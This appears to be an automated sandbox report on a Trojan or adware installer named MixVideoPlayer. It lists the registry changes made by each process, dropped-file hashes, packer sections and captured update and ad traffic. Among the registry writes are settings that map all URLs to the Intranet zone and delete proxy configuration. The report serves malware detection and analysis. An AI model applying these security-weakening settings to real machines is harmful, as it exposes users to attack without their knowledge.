[HKCR\mixp.mp3\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play]
"(Default)" = "Play"

The process WPFFontCache_v0400.exe:3016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 0D 06 52 C4 91 4A 34 F2 9F 0F E9 46 7E C6 0F"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process DeleteTasks.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 8B 3C 6E F8 C0 0D 59 B3 61 96 73 3C B0 CD C9"

The process MixVideoPlayer.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Type" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Count" = "17"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Type" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Time" = "DF 07 06 00 06 00 06 00 00 00 1B 00 0C 00 D2 03"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Count" = "17"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Time" = "DF 07 06 00 06 00 06 00 00 00 1B 00 0C 00 D2 03"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 F9 AE 4B FC 14 42 66 E3 03 76 B7 AC FB C0 86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process LTV2.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B BC DF E7 EA 95 59 AD 5E 01 AE C5 C2 D3 48 15"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process LTV2.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 17 11 6C 50 2F 14 77 0E B8 59 D4 53 04 61 E4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process LTV2.exe:1012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 3F 5D 74 9E 34 0B 60 0C 4A 3D D0 1C D9 61 21"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level"

The process %original file name%.exe:1896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\99bf1249-796b-43b5-839f-99f7def784ae]
"mixvideoplayersetup.exe" = "mixvideoplayersetup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1427377772"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 D8 38 E6 B2 CA 8F CE 36 3F 9E 72 6F 4B 4A 41"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BrowserWeb.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D3 74 6F E5 BB 8D 6C 5F EB A4 26 4A 74 73 F8"

Dropped PE files

MD5 File path
0a15d50f19c97ed4236b88e1d901004a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\99bf1249-796b-43b5-839f-99f7def784ae\mixvideoplayersetup.exe
0a15d50f19c97ed4236b88e1d901004a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe
67986ec074b86590e110a76480f7da99 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\msjava[1].dll
1725d3d92b5823a127002653a8f83a25 c:\Program Files\MixVideoPlayer\BrowserWeb.exe
e292b05501c3f8a572adb2af3bdac652 c:\Program Files\MixVideoPlayer\DeleteTasks.exe
c8831f6bab3bdac3184cfe6342285b42 c:\Program Files\MixVideoPlayer\FrameworkControl.exe
52b1e3025e9982013926d8bfa9f63d53 c:\Program Files\MixVideoPlayer\LTV2.exe
426cf211fe0f02d46a810ce6d1410e51 c:\Program Files\MixVideoPlayer\LTVNetSdk.dll
69f5b8f16afa0e00862f442401aed9ee c:\Program Files\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll
c0bbfbdfe1c019459b4fb09a6ec00c99 c:\Program Files\MixVideoPlayer\MixVideoPlayer.exe
c1c6c4fdb0ab4f220c7655ffb37624f7 c:\Program Files\MixVideoPlayer\NLog.dll
5e02ddaf3b02e43e532fc6a52b04d14b c:\Program Files\MixVideoPlayer\Newtonsoft.Json.dll
ad26d090ecf26d18496c9e3f44a7141d c:\Program Files\MixVideoPlayer\PhotoLoader.dll
fc7d210f85d5edae1a0d44c86016dcf1 c:\Program Files\MixVideoPlayer\Sider.dll
42d33fccae817596da60007a52d8005f c:\Program Files\MixVideoPlayer\Snowplow.Tracker.dll
53406e9988306cbd4537677c5336aba4 c:\Program Files\MixVideoPlayer\dotNetFx40_Full_setup.exe
99c95c044f780209b1fda39ec8e76da6 c:\Program Files\MixVideoPlayer\mixUpdater.exe
1910d297328aec93214fbc1cdab6b3cf c:\Program Files\MixVideoPlayer\policy.2.0.taglib-sharp.dll
c56aa0c915ded810350bb3873704a6e6 c:\Program Files\MixVideoPlayer\references\Interop.SHDocVw.dll
c1c7beb5231bb058c1a669a05b8701ca c:\Program Files\MixVideoPlayer\references\NDde.dll
1232f5d749700a818908cc163befed18 c:\Program Files\MixVideoPlayer\references\Newtonsoft.Json.dll
ad26d090ecf26d18496c9e3f44a7141d c:\Program Files\MixVideoPlayer\references\PhotoLoader.dll
2ce9d6746d60f3f3905dcf15c996a01d c:\Program Files\MixVideoPlayer\references\mixChecker.exe
1910d297328aec93214fbc1cdab6b3cf c:\Program Files\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll
3fd25de85281f92de0d4e4a6b7bdb03e c:\Program Files\MixVideoPlayer\references\taglib-sharp.dll
3fd25de85281f92de0d4e4a6b7bdb03e c:\Program Files\MixVideoPlayer\taglib-sharp.dll
74c133799057971b02d1393226b4ec1a c:\Program Files\MixVideoPlayer\uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 1462272 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 1466368 520192 519168 5.54468 4c0753151f24482528c099c30504caa9
.rsrc 1986560 36864 36864 3.88912 04834f22bd35f2435f42d2566e203845

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 828

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /sdb/1d/MixVideoPlayerUpdate.xml?2fcbb09b-96f8-4afb-9e97-d73ce315d8d3 HTTP/1.1
Host: staticrr.mixvideoplayer.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:48 GMT
Content-Type: text/xml
Content-Length: 671
Last-Modified: Fri, 05 Jun 2015 11:17:55 GMT
Connection: keep-alive
ETag: "55718563-29f"
Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>
<LastVersion>
	<url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup.exe</url>
	<version>1.0.0.20</version>
	<TrackActivity>true</TrackActivity>
	<TrackErrors>true</TrackErrors>
	<vast active="true">
		<adnum>3</adnum>
		<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,JP,CA,IR,AU,NL,ID,CO,PK">
			<![CDATA[hXXp://ads.adaptv.advertising.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaFw4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideoplayer.com&eov=eov]]>
		</adurl>
	</vast>
	<CollectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>
</LastVersion>


GET /click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=NTN8NTc5fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|9d806520-0be2-11e5-8e44-f8bc125381b8 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: network.adsmarket.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Sat, 06 Jun 2015 00:26:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.38
Set-Cookie: ce-visitor-iWZrnWWe=imGQ35nVesyjoHuygN672oh4oNBn4XveiWKQml6bepI; expires=Tue, 21-Jul-2015 00:26:05 GMT; path=/; domain=network.adsmarket.com
Set-Cookie: ce-click-iWRymmajfJe3Z2uZYqSAnIpq=iWRymmajfJe3Z2uZYqSAnIpq; expires=Sun, 07-Jun-2015 00:26:05 GMT; path=/; domain=network.adsmarket.com
